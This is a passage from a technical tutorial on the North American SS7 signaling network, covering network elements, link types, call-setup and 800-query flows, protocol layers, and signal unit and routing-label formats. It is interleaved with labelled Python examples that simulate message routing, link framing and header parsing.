Associated signaling works well as long as a switch's only signaling requirements are between itself and other switches to which it has trunks. If call setup and management were the only application of SS7, associated signaling would meet that need simply and efficiently. In fact, much of the out-of-band signaling deployed in Europe today uses associated mode. The North American implementers of Signaling System 7, however, wanted to design a signaling network that would enable any node to exchange signaling with any other SS7-capable node. Clearly, associated signaling becomes much more complicated when it is used to exchange signaling between nodes which do not have a direct connection. From this need, the North American Signaling System 7 architecture was born.

4. The North American Signaling Architecture

The North American signaling architecture defines a completely new and separate signaling network. The network is built out of three essential components, interconnected by signaling links. These components are signal switching points (SSPs), signal transfer points (STPs), and signal control points (SCPs). They are outlined in Table 1 below.

Table 1: North American Signaling Architecture Components

 Signal switching points (SSPs)
   SSPs are telephone switches (end offices or tandems) equipped with SS7-capable software and terminating signaling links. They generally originate, terminate, or switch calls.

 Signal transfer points (STPs)
   STPs are the packet switches of the SS7 network. They receive and route incoming signaling messages towards the proper destination. They also perform specialized routing functions.

 Signal control points (SCPs)
   SCPs are databases that provide information necessary for advanced call-processing capabilities.

Once deployed, the availability of the SS7 network is critical to call processing. Unless SSPs can exchange signaling, they cannot complete any interswitch calls.
For this reason, the SS7 network is built using a highly redundant architecture. Each individual element must also meet exacting requirements for availability. Finally, protocol has been defined between interconnected elements to facilitate the routing of signaling traffic around any difficulties that may arise in the signaling network. To enable signaling network architectures to be easily communicated and understood, a standard set of symbols was adopted for depicting SS7 networks. Figure 2 shows the symbols that are used to depict these three key elements of any SS7 network. STPs and SCPs are customarily deployed in pairs. While elements of a pair are not generally co-located, they work redundantly to perform the same logical function. When drawing complex network diagrams, these pairs may be depicted as a single element for simplicity, as shown in Figure 3. Figure 3: STP and SCP Pairs 5. Basic Signaling Architecture Figure 4 shows a small example of how the basic elements of an SS7 network are deployed to form two interconnected networks. Figure 4: Sample Network Several points should be noted: 1.STPs W and X perform identical functions. They are redundant. Together, they are referred to as a mated pair of STPs. Similarly, STPs Y and Z form a mated pair. 2.Each SSP has two links (or sets of links), one to each STP of a mated pair. All SS7 signaling to the rest of the world is sent out over these links. Because the STPs of a mated pair are redundant, messages sent over either link (to either STP) will be treated equivalently. 3.The STPs of a mated pair are joined by a link (or set of links). 4.Two mated pairs of STPs are interconnected by four links (or sets of links) These links are referred to as a quad. 5.SCPs are usually (though not always) deployed in pairs. As with STPs, the SCPs of a pair are intended to function identically. Pairs of SCPs are also referred to as mated pairs of SCPs. Note that they are not directly joined by a pair of links. 
Signaling architectures such as this, which provide indirect signaling paths between network elements, are referred to as providing quasi-associated signaling. 6. SS7 Link Types SS7 signaling links are characterized according to their use in the signaling network. Virtually all links are identical in that they are 56-kbps or 64- kbps bi-directional data links that support the same lower layers of the protocol; what is different is their use within a signaling network. The defined link types are shown in Figure 5 below and defined as follows: Figure 5: Link Types A Links A links are links that interconnect an STP and either an SSP or an SCP, which are collectively referred to as signaling end points ("A" is intended to stand for access). A links are used for the sole purpose of delivering signaling to or from the signaling end points (they could just as well be referred to as signaling beginning points). Examples of A links are 2-8, 3-7, and 5-12 in Figure 5. Signaling that an SSP or SCP wishes to send to any other node is sent on either of its A links to its "home" STP, which, in turn, processes or routes the messages. Similarly, messages intended for an SSP or SCP will be routed to one of its "home" STPs, which will forward them to the addressed node over its A links. C Links C links are links that interconnect mated STPs. As will be seen later, they are used to enhance the reliability of the signaling network in instances where one or several links are unavailable. "C" stands for cross. (7-8, 9-10 and 11-12 are C links.) B Links, D Links, and B/D Links Links interconnecting two mated pairs of STPs are referred to as either B links, D links, or B/D links. Regardless of their name, their function is to carry signaling messages beyond their initial point of entry to the signaling network towards their intended destination. The "B" stands for bridge and is intended to describe the quad of links interconnecting peer pairs of STPs. 
The "D" denotes diagonal and is intended to describe the quad of links interconnecting mated pairs of STPs at different hierarchical levels. Because there is no clear hierarchy associated with a connection between networks, interconnecting links are referred to as either B, D, or B/D links. (7-11 and 7-12 are examples of B links; 8-9 and 7-10 are examples of D links; 10-13 and 9-14 are examples of interconnecting links and can be referred to as B, D, or B/D links.)

E Links

While an SSP is connected to its "home" STP pair by a set of "A" links, enhanced reliability can be provided by deploying an additional set of links to a second STP pair. These links, called "E" (extended) links, provide backup connectivity to the SS7 network in the event that the "home" STPs cannot be reached via the "A" links. While all SS7 networks include "A," "B/D," and "C" links, "E" links may or may not be deployed at the discretion of the network provider. The decision of whether or not to deploy "E" links can be made by comparing the cost of deployment with the improvement in reliability. (1-11 and 1-12 are E links.)

F Links

"F" (for fully associated) links are links which directly connect two signaling end points. F links allow associated signaling only. Because they _bypass_ the security features provided by an STP, F links are not generally deployed between networks. Their use within an individual network is at the discretion of the network provider. (1-2 is an F link.)

7. Basic Call Setup Example

Before going into much more detail, it might be helpful to look at several basic calls and the way in which they use SS7 signaling (see Figure 6).

Figure 6: Call Setup Example

In this example, a subscriber on switch A places a call to a subscriber on switch B:

1. Switch A analyzes the dialed digits and determines that it needs to send the call to switch B.
2. Switch A selects an idle trunk between itself and switch B and formulates an initial address message (IAM), the basic message necessary to initiate a call. The IAM is addressed to switch B. It identifies the initiating switch (switch A), the destination switch (switch B), the trunk selected, the calling and called numbers, as well as other information beyond the scope of this example.
3. Switch A picks one of its A links (say AW) and transmits the message over the link for routing to switch B.
4. STP W receives the message, inspects its routing label, and determines that it is to be routed to switch B. It transmits the message on link BW.
5. Switch B receives the message. On analyzing the message, it determines that it serves the called number and that the called number is idle.
6. Switch B formulates an address complete message (ACM), which indicates that the IAM has reached its proper destination. The message identifies the recipient switch (A), the sending switch (B), and the selected trunk.
7. Switch B picks one of its A links (say BX) and transmits the ACM over the link for routing to switch A. At the same time, it completes the call path in the backwards direction (towards switch A), sends a ringing tone over that trunk towards switch A, and rings the line of the called subscriber.
8. STP X receives the message, inspects its routing label, and determines that it is to be routed to switch A. It transmits the message on link AX.
9. On receiving the ACM, switch A connects the calling subscriber line to the selected trunk in the backwards direction (so that the caller can hear the ringing sent by switch B).
10. When and/or if the called subscriber picks up the phone, switch B formulates an answer message (ANM), identifying the intended recipient switch (A), the sending switch (B), and the selected trunk.
11. Switch B selects the same A link it used to transmit the ACM (link BX) and sends the ANM. By this time, the trunk must also be connected to the called line in both directions (to allow conversation).
12. STP X recognizes that the ANM is addressed to switch A and forwards it over link AX.
13. Switch A ensures that the calling subscriber is connected to the outgoing trunk (in both directions) and that conversation can take place.
14. If the calling subscriber hangs up first (following the conversation), switch A will generate a release message (REL) addressed to switch B, identifying the trunk associated with the call. It sends the message on link AW.
15. STP W receives the REL, determines that it is addressed to switch B, and forwards it using link WB.
16. Switch B receives the REL, disconnects the trunk from the subscriber line, returns the trunk to idle status, generates a release complete message (RLC) addressed back to switch A, and transmits it on link BX. The RLC identifies the trunk used to carry the call.
17. STP X receives the RLC, determines that it is addressed to switch A, and forwards it over link AX.
18. On receiving the RLC, switch A idles the identified trunk.

8. Database Query Example

People generally are familiar with the toll-free aspect of 800 (or 888) numbers, but these numbers have significant additional capabilities made possible by the SS7 network. 800 numbers are "virtual" telephone numbers. Although they are used to point to "real" telephone numbers, they are not assigned to the subscriber line itself. When a subscriber dials an 800 number, it is a signal to the switch to suspend the call and seek further instructions from a database. The database will provide either a real phone number to which the call should be directed, or it will identify another network (e.g., a long-distance carrier) to which the call should be routed for further processing.
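The call-setup exchange of section 7, as an added example that is not part of the article: a small simulation of the Figure 6 network in which SSPs A and B hand messages to their home STPs W and X, the STPs route purely on the destination point code and fall back to the C link when an A link is down, and each switch keeps a per-trunk state so that an IAM, ACM, ANM, REL or RLC arriving for a trunk in the wrong state is rejected rather than acted on. The topology, the called-number table and the symbolic point codes are constructed for the example.

```python
from dataclasses import dataclass

# Constructed topology of Figure 6: SSPs A and B, mated STP pair W and X,
# A links AW, AX, BW, BX and the C link WX. Point codes are symbolic names.
LINKS = {"AW": ("A", "W"), "AX": ("A", "X"), "BW": ("B", "W"),
         "BX": ("B", "X"), "WX": ("W", "X")}
MATE = {"W": "X", "X": "W"}                    # STP -> the other STP of its pair
SERVES = {"A": {"5551000"}, "B": {"5552000"}}  # constructed subscriber table

# Which message may arrive for a trunk in which state, and the state after it.
TRANSITIONS = {("IAM", "idle"): "setup", ("ACM", "setup"): "ringing",
               ("ANM", "ringing"): "talking", ("REL", "talking"): "idle",
               ("RLC", "releasing"): "idle"}

@dataclass
class Msg:
    kind: str          # IAM, ACM, ANM, REL or RLC
    opc: str           # originating point code
    dpc: str           # destination point code (all an STP looks at)
    cic: int           # trunk the message refers to
    called: str = ""   # called number (IAM only)

class Sim:
    def __init__(self, down=()):
        self.down = set(down)            # failed links, e.g. {"AW"}
        self.hops = []                   # (link, kind) in transmission order
        self.trunk = {"A": {}, "B": {}}  # per switch: cic -> state
        self.rejected = []               # (switch, kind, state) not acted on

    def links_of(self, node):
        return [l for l, ends in LINKS.items() if node in ends and l not in self.down]

    def send(self, msg, node):
        """An SSP hands the message to either of its home STPs (steps 3 and 7)."""
        self.forward(msg, node, self.links_of(node)[0])

    def forward(self, msg, sender, link):
        self.hops.append((link, msg.kind))
        a, b = LINKS[link]
        here = b if a == sender else a
        if here == msg.dpc:                       # reached the addressed switch
            self.receive(msg, here)
            return
        # At an STP: inspect the routing label and route on the DPC (steps 4, 8).
        for l in self.links_of(here):
            if msg.dpc in LINKS[l]:
                self.forward(msg, here, l)
                return
        # No usable A link to the DPC: cross to the mate over the C link, but
        # never bounce a message back over the C link it just arrived on.
        mate = MATE[here]
        c_link = next((l for l in self.links_of(here) if mate in LINKS[l]), None)
        if sender == mate or c_link is None:
            raise RuntimeError(f"{here}: no route to {msg.dpc} for {msg.kind}")
        self.forward(msg, here, c_link)

    def receive(self, msg, sw):
        state = self.trunk[sw].get(msg.cic, "idle")
        new = TRANSITIONS.get((msg.kind, state))
        if new is None:                           # e.g. a stray RLC for a live trunk
            self.rejected.append((sw, msg.kind, state))
            return
        if msg.kind == "IAM":
            if msg.called not in SERVES[sw]:      # step 5: do we serve this number?
                self.rejected.append((sw, "IAM", "not served"))
                return
            self.trunk[sw][msg.cic] = "ringing"   # steps 6-7: ACM, ring the line
            self.send(Msg("ACM", sw, msg.opc, msg.cic), sw)
        elif msg.kind == "REL":                   # step 16: idle trunk, answer RLC
            self.trunk[sw][msg.cic] = "idle"
            self.send(Msg("RLC", sw, msg.opc, msg.cic), sw)
        else:
            self.trunk[sw][msg.cic] = new

def run_call(down=()):
    """Steps 1-18: a call from A to B on trunk 7, then the caller hangs up."""
    sim, cic = Sim(down), 7
    sim.trunk["A"][cic] = "setup"                        # step 2: seize an idle trunk
    sim.send(Msg("IAM", "A", "B", cic, "5552000"), "A")  # step 3
    sim.trunk["B"][cic] = "talking"                      # step 10: called party answers
    sim.send(Msg("ANM", "B", "A", cic), "B")             # step 11
    sim.trunk["A"][cic] = "releasing"                    # step 14: caller hangs up
    sim.send(Msg("REL", "A", "B", cic), "A")
    return sim

if __name__ == "__main__":
    s = run_call(down={"AW", "BX"})
    print(s.hops, s.trunk, s.rejected)
```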
While the response from the database could be the same for every call (as, for example, if you have a personal 800 number), it can be made to vary based on the calling number, the time of day, the day of the week, or a number of other factors. The following example shows how an 800 call is routed (see Figure 7).

Figure 7: Database Query Example

1. A subscriber served by switch A wants to reserve a rental car at a company's nearest location. She dials the company's advertised 800 number.
2. When the subscriber has finished dialing, switch A recognizes that this is an 800 call and that it requires assistance to handle it properly.
3. Switch A formulates an 800 query message including the calling and called number and forwards it to either of its STPs (e.g., X) over its A link to that STP (AX).
4. STP X determines that the received query is an 800 query and selects a database suitable to respond to the query (e.g., M).
5. STP X forwards the query to SCP M over the appropriate A link (MX).
6. SCP M receives the query, extracts the passed information, and (based on its stored records) selects either a "real" telephone number or a network (or both) to which the call should be routed.
7. SCP M formulates a response message with the information necessary to properly process the call, addresses it to switch A, picks an STP and an A link to use (e.g., MW), and routes the response.
8. STP W receives the response message, recognizes that it is addressed to switch A, and routes it to A over AW.
9. Switch A receives the response and uses the information to determine where the call should be routed. It then picks a trunk to that destination, generates an initial address message (IAM), and proceeds (as it did in the previous example) to set up the call.

9. Layers of the SS7 Protocol

As the call-flow examples show, the SS7 network is an interconnected set of network elements that is used to exchange messages in support of telecommunications functions. The SS7 protocol is designed to both facilitate these functions and to maintain the network over which they are provided. Like most modern protocols, the SS7 protocol is layered. The underlying layers of the SS7 protocol are as follows:

Physical Layer

This defines the physical and electrical characteristics of the signaling links of the SS7 network. Signaling links utilize DS0 channels and carry raw signaling data at a rate of 56 kbps or 64 kbps (56 kbps is the more common implementation).

Message Transfer Part - Level 2

The level 2 portion of the message transfer part (MTP Level 2) provides link-layer functionality. It ensures that the two end points of a signaling link can reliably exchange signaling messages. It incorporates such capabilities as error checking, flow control, and sequence checking.

Message Transfer Part - Level 3

The level 3 portion of the message transfer part (MTP Level 3) extends the functionality provided by MTP level 2 to provide network layer functionality. It ensures that messages can be delivered between signaling points across the SS7 network regardless of whether they are directly connected. It includes such capabilities as node addressing, routing, alternate routing, and congestion control. Collectively, MTP levels 2 and 3 are referred to as the message transfer part (MTP).

Signaling Connection Control Part

The signaling connection control part (SCCP) provides two major functions that are lacking in the MTP. The first of these is the capability to address applications within a signaling point. The MTP can only receive and deliver messages from a node "as a whole"; it does not deal with software applications within a node. While MTP network management messages and basic call-setup messages are addressed to a node as a whole, other messages are used by separate applications (referred to as subsystems) within a node. Examples of subsystems are 800 call processing, calling-card processing, advanced intelligent network, and CLASS services (e.g., Repeat Dialing and Call Return). The SCCP allows these subsystems to be addressed explicitly.

Global Title Translation

The second function provided by the SCCP is the ability to perform incremental routing using a capability called global title translation. Global title translation frees originating signaling points from the burden of having to know every potential destination to which they might have to route a message. A switch can originate a query, for example, and address it to an STP along with a request for global title translation. The receiving STP can then examine a portion of the message, make a determination as to where the message should be routed, and then route it.

For example, calling-card queries (used to verify that a call can be properly billed to a calling card) must be routed to an SCP designated by the company that issued the calling card. Rather than maintaining a nationwide database of where such queries should be routed (based on the calling-card number), switches generate queries addressed to their local STPs, which, using global title translation, select the correct destination to which the message should be routed. Note that there is no magic here; STPs must maintain a database that enables them to determine to where a query should be routed. Global title translation effectively centralizes the problem and places it in a node (the STP) that has been designed to perform this function.

In performing global title translation, an STP does not need to know the exact final destination of a message. It can, instead, perform "intermediate global title translation," in which it uses its tables to find another STP further along the route to the destination. That STP, in turn, can perform "final global title translation," routing the message to its actual destination.
Intermediate global title translation minimizes the need for STPs to maintain extensive information about nodes which are far removed from them.

Global title translation is also used at the STP to share load among mated SCPs in both normal and failure scenarios. In these instances, when messages arrive at an STP for final global title translation and routing to a database, the STP can select from among available redundant SCPs. It can select an SCP on either a priority basis (referred to as primary/backup) or so as to equalize the load across all available SCPs (referred to as load sharing).

ISDN User Part (ISUP)

The ISDN user part defines the messages and protocol used in the establishment and tear down of voice and data calls over the public switched network, and to manage the trunk network on which they rely. Despite its name, ISUP is used for both ISDN and non-ISDN calls. In the North American version of SS7, ISUP messages rely exclusively on MTP to transport messages between concerned nodes.

Transaction Capabilities Application Part (TCAP)

The transaction capabilities application part defines the messages and protocol used to communicate between applications (deployed as subsystems) in nodes. It is used for database services such as calling card, 800, and AIN as well as switch-to-switch services including Repeat Dialing and Call Return. Because TCAP messages must be delivered to individual applications within the nodes they address, they use the SCCP for transport.

Operations, Maintenance and Administration Part (OMAP)

The operations, maintenance, and administration part defines messages and protocol designed to assist administrators of the SS7 network. To date, the most fully developed and deployed of these capabilities are procedures for validating network routing tables and for diagnosing link troubles. OMAP includes messages that use both the MTP and SCCP for routing.

10. What Goes Over the Signaling Link

Signaling information is passed over the signaling link in messages, which are called signal units (SUs). Three types of signal units are defined in the SS7 protocol:

- Message signal units (MSUs)
- Link status signal units (LSSUs)
- Fill-in signal units (FISUs)

Signal units are transmitted continuously in both directions on any link that is in service. A signaling point that does not have MSUs or LSSUs to send will send FISUs over the link. The FISUs perform the function suggested by their name; they "fill up" the signaling link until there is a need to send purposeful signaling. They also facilitate link transmission monitoring and the acknowledgment of other SUs.

All transmission on the signaling link is broken up into 8-bit bytes, referred to as octets. Signal units on a link are delimited by a unique 8-bit pattern known as a flag. The flag is defined as the 8-bit pattern "01111110". Because of the possibility that data within a signal unit would contain this pattern, bit manipulation techniques are used to ensure that the pattern does not occur within the message as it is transmitted over the link. (The signal unit is reconstructed once it has been taken off the link, and any bit manipulation is reversed.) Thus, any occurrence of the flag on the link indicates the end of one signal unit and the beginning of another. While in theory two flags could be placed between SUs (one to mark the end of the current message and one to mark the start of the next message), in practice a single flag is used for both purposes.

11. Addressing in the SS7 Network

Every network must have an addressing scheme, and the SS7 network is no different. Network addresses are required so that a node can exchange signaling with nodes to which it does not have a physical signaling link. In SS7, addresses are assigned using a three-level hierarchy. Individual signaling points are identified as belonging to a "cluster" of signaling points. Within that cluster, each signaling point is assigned a "member" number. Similarly, a cluster is defined as being part of a "network." Any node in the American SS7 network can be addressed by a three-level number defined by its network, cluster, and member numbers. Each of these numbers is an 8-bit number and can assume values from 0 to 255. This three-level address is known as the "point code" of the signaling point.

Network numbers are assigned on a nationwide basis by a neutral party. Regional Bell operating companies (RBOCs), major independent telephone companies and interexchange carriers already have network numbers assigned. Since network numbers are a relatively scarce resource, companies' networks are expected to meet certain size requirements in order to be assigned a network number. Smaller networks can be assigned one or more cluster numbers within network numbers 1, 2, 3, and 4. The smallest networks are assigned "point codes" within "network number" 5. The cluster to which they are assigned is determined by the state in which they are located. The network number 0 is not available for assignment and network number 255 is reserved for future use.

In short, "point code" is the term used to describe the three-level address number created by combining the network, cluster, and member numbers. A point code uniquely identifies a signaling point within the American SS7 network and is used whenever it is necessary to address that signaling point.

12. Signal Unit Structure

Signal units of each type follow a format unique to that type. A high-level view of those formats is shown in Figure 8.

Figure 8: Signaling Unit Formats

All three SU types have a set of common fields that are used by MTP Level 2. They are as follows:

Flag

Flags delimit SUs. A flag marks the end of one SU and the start of the next.

Checksum

The checksum is an 8-bit sum intended to verify that the SU has passed across the link error-free. The checksum is calculated from the transmitted message by the transmitting signaling point and inserted in the message. On receipt, it is recalculated by the receiving signaling point. If the calculated result differs from the received checksum, the received SU has been corrupted. A retransmission is requested.

Length Indicator

The length indicator indicates the number of octets between itself and the checksum. It serves both as a check on the integrity of the SU and as a means of discriminating between different types of SUs at level 2. As can be inferred from Figure 8, FISUs have a length indicator of 0; LSSUs have a length indicator of 1 or 2 (currently all LSSUs have a length indicator of 1) and MSUs have a length indicator greater than 2. According to the protocol, only 6 of the 8 bits in the length indicator field are actually used to store this length; thus the largest value that can be accommodated in the length indicator is 63. For MSUs with more than 63 octets following the length indicator, the value of 63 is used.

BSN/BIB and FSN/FIB

These octets hold the backwards sequence number (BSN), the backwards indicator bit (BIB), the forward sequence number (FSN), and the forward indicator bit (FIB). These fields are used to confirm receipt of SUs and to ensure that they are received in the order in which they were transmitted. They are also used to provide flow control. MSUs and LSSUs, when transmitted, are assigned a sequence number that is placed in the forward sequence number field of the outgoing SU. This SU is stored by the transmitting signaling point until it is acknowledged by the receiving signaling point. Since the 7 bits allocated to the forward sequence number can store 128 distinct values, it follows that a signaling point is restricted to sending 128 unacknowledged SUs before it must await an acknowledgment. By acknowledging an SU, the receiving node frees that SU's sequence number at the transmitting node, making it available for a new outgoing SU. Signaling points acknowledge receipt of SUs by placing the sequence number of the last correctly received and in-sequence SU in the backwards sequence number of every SU they transmit. In that way, they acknowledge all previously received SUs as well. The forward and backwards indicator bits are used to indicate sequencing or data-corruption errors and to request retransmission.

13. What are the Functions of the Different Signaling Units?

FISUs themselves have no information payload. Their purpose is to occupy the link at those times when there are no LSSUs or MSUs to send. Because they undergo error checking, FISUs facilitate the constant monitoring of link quality in the absence of signaling traffic. FISUs can also be used to acknowledge the receipt of messages using the backwards sequence number and backwards indicator bit.

LSSUs are used to communicate information about the signaling link between the nodes on either end of the link. This information is contained in the status field of the SU (see Figure 8). Because the two ends of a link are controlled by independent processors, there is a need to provide a means for them to communicate. LSSUs provide the means for performing this function. LSSUs are used primarily to signal the initiation of link alignment, the quality of received signaling traffic, and the status of the processors at either end of the link. Because they are sent only between the signaling points at either end of the link, LSSUs do not require any addressing information.

MSUs are the workhorses of the SS7 network. All signaling associated with call setup and tear down, database query and response, and SS7 network management takes place using MSUs. MSUs are the basic envelope within which all addressed signaling information is placed. As will be shown below, there are several different types of MSUs. All MSUs have certain fields in common. Other fields differ according to the type of message.
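The level 2 framing of sections 10, 12 and 13, as an added example that is not part of the article: it builds FISUs, LSSUs and MSUs with their BSN/BIB, FSN/FIB and length-indicator octets, puts them on a simulated link with the 01111110 flag and the zero-bit insertion that keeps the flag out of the data, recovers and classifies them on the other side, and tracks the 128-SU window that the 7-bit sequence numbers impose. The 16-bit X.25-style CRC used for the check bits and the LSB-first bit order on the link are assumptions made for this example.

```python
# Added example (not from the article): MTP Level 2 framing of FISUs, LSSUs
# and MSUs. The flag, the length-indicator rules and the 7-bit sequence
# numbers follow the text; the 16-bit X.25-style CRC for the check bits and
# the LSB-first bit order on the link are assumptions made for this example.

FLAG = [0, 1, 1, 1, 1, 1, 1, 0]                # the delimiter pattern 01111110

def crc16_x25(data: bytes) -> int:
    """Reflected CRC-16, poly 0x1021, init and final XOR 0xFFFF (assumed)."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc ^ 0xFFFF

def su_type(li: int) -> str:
    """Level 2 tells the SU types apart by LI alone: 0, 1-2, or more than 2."""
    return "FISU" if li == 0 else "LSSU" if li <= 2 else "MSU"

def build_su(bsn: int, bib: int, fsn: int, fib: int, body: bytes = b"") -> bytes:
    """body: b'' for a FISU, one status octet for an LSSU, SIO+SIF for an MSU."""
    li = min(len(body), 63)              # only 6 bits: 63 stands for 63 or more
    head = bytes([(bsn & 0x7F) | (bib & 1) << 7,
                  (fsn & 0x7F) | (fib & 1) << 7, li])
    crc = crc16_x25(head + body)
    return head + body + bytes([crc & 0xFF, crc >> 8])

def parse_su(raw: bytes) -> dict:
    """Verify the check bits and the LI, then split out the level 2 fields."""
    if len(raw) < 5:
        return {"type": "CORRUPT"}
    body, crc = raw[:-2], raw[-2] | raw[-1] << 8
    if crc16_x25(body) != crc or (body[2] & 0x3F) != min(len(body) - 3, 63):
        return {"type": "CORRUPT"}        # receiver would request retransmission
    return {"type": su_type(body[2] & 0x3F), "li": body[2] & 0x3F,
            "bsn": body[0] & 0x7F, "bib": body[0] >> 7,
            "fsn": body[1] & 0x7F, "fib": body[1] >> 7, "body": body[3:]}

def to_bits(data: bytes) -> list:
    return [(b >> i) & 1 for b in data for i in range(8)]     # LSB first

def from_bits(bits: list) -> bytes:
    return bytes(sum(bits[i + j] << j for j in range(8))
                 for i in range(0, len(bits) - len(bits) % 8, 8))

def stuff(bits: list) -> list:
    """Zero-bit insertion: a 0 after every five 1s, so data never forms the flag."""
    out, ones = [], 0
    for b in bits:
        out.append(b)
        ones = ones + 1 if b else 0
        if ones == 5:
            out.append(0)
            ones = 0
    return out

def frame(sus: list) -> list:
    """Bits as sent on the link: a single flag ends one SU and starts the next."""
    out = FLAG[:]
    for su in sus:
        out += stuff(to_bits(su)) + FLAG
    return out

def deframe(bits: list) -> list:
    """Cut the stream at every flag, drop the inserted zeros, parse each SU."""
    sus, cur, ones, i = [], [], 0, 0
    while i < len(bits):
        if bits[i:i + 8] == FLAG:
            if cur:
                sus.append(parse_su(from_bits(cur)))
            cur, ones, i = [], 0, i + 8
            continue
        b, i = bits[i], i + 1
        if ones == 5 and b == 0:          # the inserted zero is not data
            ones = 0
            continue
        cur.append(b)
        ones = ones + 1 if b else 0
    return sus

class SendWindow:
    """7-bit FSN: at most 128 SUs may be outstanding before an acknowledgment."""
    def __init__(self):
        self.next_fsn, self.unacked = 0, []

    def assign(self) -> int:
        if len(self.unacked) >= 128:
            raise RuntimeError("128 unacknowledged SUs: wait for a BSN")
        fsn, self.next_fsn = self.next_fsn, (self.next_fsn + 1) % 128
        self.unacked.append(fsn)
        return fsn

    def ack(self, bsn: int) -> None:
        """A BSN acknowledges that SU and every earlier one still outstanding."""
        if bsn in self.unacked:
            del self.unacked[:self.unacked.index(bsn) + 1]
```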
The type of MSU is indicated in the service information octet shown in Figure 8; the addressing and informational content of the MSU is contained in the signaling information field.

14. Message Signal Unit Structure

The functionality of the message signal unit lies in the actual content of the service information octet and the signaling information field (see Figure 8). The service information octet is an 8-bit field (as might be inferred from its name) that contains three types of information as follows:

1. Four bits are used to indicate the type of information contained in the signaling information field. They are referred to as the service indicator. The values most commonly used in American networks are outlined in Table 2.

   Table 2: Common Service Indicator Values

     Value   Function
     -----   ---------------------------------------------
     0       Signaling Network Management
     1       Signaling Network Testing and Maintenance
     3       Signaling Connection Control Part (SCCP)
     5       ISDN User Part (ISUP)

2. Two bits are used to indicate whether the message is intended (and coded) for use in a national or international network. They are generally coded with a value of 2, national network.
3. The remaining 2 bits are used (in American networks) to identify a message priority, from 0 to 3, with 3 being the highest priority. Message priorities do not control the order in which messages are transmitted; they are only used in cases of signaling network congestion. In that case, they indicate whether a message has sufficient priority to merit transmission during an instance of congestion and/or whether it can be discarded en route to a destination.

The format of the contents of the signaling information field is determined by the service indicator. (Within user parts, there are further distinctions in message formats, but the service indicator provides the first piece of information necessary for routing and/or decoding the message.) The first portion of the signaling information field is identical for all MSUs currently in use.
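An added example (not the article's code) of the service information octet just described and of the network-cluster-member point codes of section 11; it also packs and unpacks the 7-octet routing label (DPC, OPC, SLS) that the next paragraph and Table 3 describe, and uses the SLS to pick among redundant links toward the DPC. The ANSI bit positions inside the SIO and the member-octet-first order of each point code are assumptions, since the article gives neither; the point code values and link names are constructed.

```python
# Added example (not the article's code): SIO, point codes and routing label.
# Assumed: ANSI SIO layout (service indicator in bits 0-3, priority in bits
# 4-5, network indicator in bits 6-7) and member-first point code octets.

SERVICE = {0: "Signaling Network Management",        # Table 2
           1: "Signaling Network Testing and Maintenance",
           3: "Signaling Connection Control Part (SCCP)",
           5: "ISDN User Part (ISUP)"}

def build_sio(si: int, ni: int = 2, prio: int = 0) -> int:
    """si: 4-bit service indicator; ni: 2-bit network indicator (2 = national);
    prio: 2-bit message priority, 3 highest."""
    if not (0 <= si < 16 and 0 <= ni < 4 and 0 <= prio < 4):
        raise ValueError("SIO field out of range")
    return si | prio << 4 | ni << 6

def parse_sio(octet: int) -> dict:
    si = octet & 0x0F
    return {"service": SERVICE.get(si, f"other ({si})"),
            "priority": (octet >> 4) & 3, "national": (octet >> 6) == 2}

def admit(octet: int, congestion: int) -> bool:
    """Under congestion level 0-3 only messages of at least that priority get
    through; priority never reorders traffic on an uncongested link."""
    return parse_sio(octet)["priority"] >= congestion

def parse_pc(text: str) -> tuple:
    """'network-cluster-member', each 0..255; network 0 cannot be assigned."""
    parts = tuple(int(p) for p in text.split("-"))
    if len(parts) != 3 or not all(0 <= v <= 255 for v in parts) or parts[0] == 0:
        raise ValueError(f"invalid point code {text!r}")
    return parts

def pc_octets(pc: tuple) -> bytes:
    net, cluster, member = pc
    return bytes([member, cluster, net])      # member octet sent first (assumed)

def build_label(dpc: str, opc: str, sls: int) -> bytes:
    """Routing label in order of transmission: DPC, OPC, then the SLS octet."""
    return pc_octets(parse_pc(dpc)) + pc_octets(parse_pc(opc)) + bytes([sls & 0xFF])

def parse_label(sif: bytes) -> dict:
    """Split the 7-octet routing label off the front of a signaling information field."""
    if len(sif) < 7:
        raise ValueError("SIF shorter than a routing label")
    return {"dpc": f"{sif[2]}-{sif[1]}-{sif[0]}", "opc": f"{sif[5]}-{sif[4]}-{sif[3]}",
            "sls": sif[6], "rest": bytes(sif[7:])}

def select_link(label: dict, routes: dict, down=()) -> str:
    """STP side of 'distributes load among redundant routes': the SLS picks one
    of the working links toward the DPC, so one SLS value stays on one link
    (keeping its messages in order) as long as all links are up."""
    links = [l for l in routes.get(label["dpc"], []) if l not in down]
    if not links:
        raise RuntimeError(f"no route to {label['dpc']}")
    return links[label["sls"] % len(links)]

def build_msu_payload(si: int, dpc: str, opc: str, sls: int, data: bytes) -> bytes:
    """SIO followed by SIF (routing label + user data): what an MSU carries."""
    return bytes([build_sio(si)]) + build_label(dpc, opc, sls) + data
```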
It is referred to as the routing label. Simply stated, the routing label identifies the message originator, the intended destination of the message, and a field referred to as the signaling-link selection field, which is used to distribute message traffic over the set of possible links and routes. The routing label consists of 7 octets that are outlined below in Table 3 (in order of transmission):

Table 3: Routing Label

  Octet Group                       Function                                            Octets
  --------------------------------  --------------------------------------------------  ------
  Destination Point Code (DPC)      Contains the address of the node to which the       3
                                    message is being sent
  Originating Point Code (OPC)      Contains the address of the message originator      3
  Signaling Link Selection (SLS)    Distributes load among redundant routes             1

Point codes consist of the three-part identifier (network #, cluster #, member #), which uniquely identifies a signaling point.

16. Acronym List

  ACM      Address Complete Message
  ANM      Answer Message
  A Links  Access Links
  BIB      Backward Indicator Bit
  B Links  Bridge Links
  BSN      Backward Sequence Number
  D Links  Diagonal Links
  DPC      Destination Point Code
  E Link   Extended Link
  F Link   Fully Associated Link
  FIB      Forward Indicator Bit
  FISU     Fill-in Signal Unit
  FSN      Forward Sequence Number
  IAM      Initial Address Message
  ISDN     Integrated Services Digital Network
  ISUP     ISDN User Part
  kbps     Kilobits per Second
  LSSU     Link Status Signal Unit
  MF       Multifrequency
  MSU      Message Signal Unit
  MTP      Message Transfer Part
  OMAP     Operations, Maintenance and Administration Part
  OPC      Originating Point Code
  PSTN     Public Switched Telephone Network
  RBOC     Regional Bell Operating Company
  REL      Release Message
  RLC      Release Complete Message
  RSP      Route Set Prohibited Test Message
  RSR      Restricted Test Message
  SS7      Signaling System 7
  SCCP     Signaling Connection Control Part
  SCP      Signal Control Point
  SLS      Signaling Link Selection
  SSP      Signal Switching Point
  STP      Signal Transfer Point
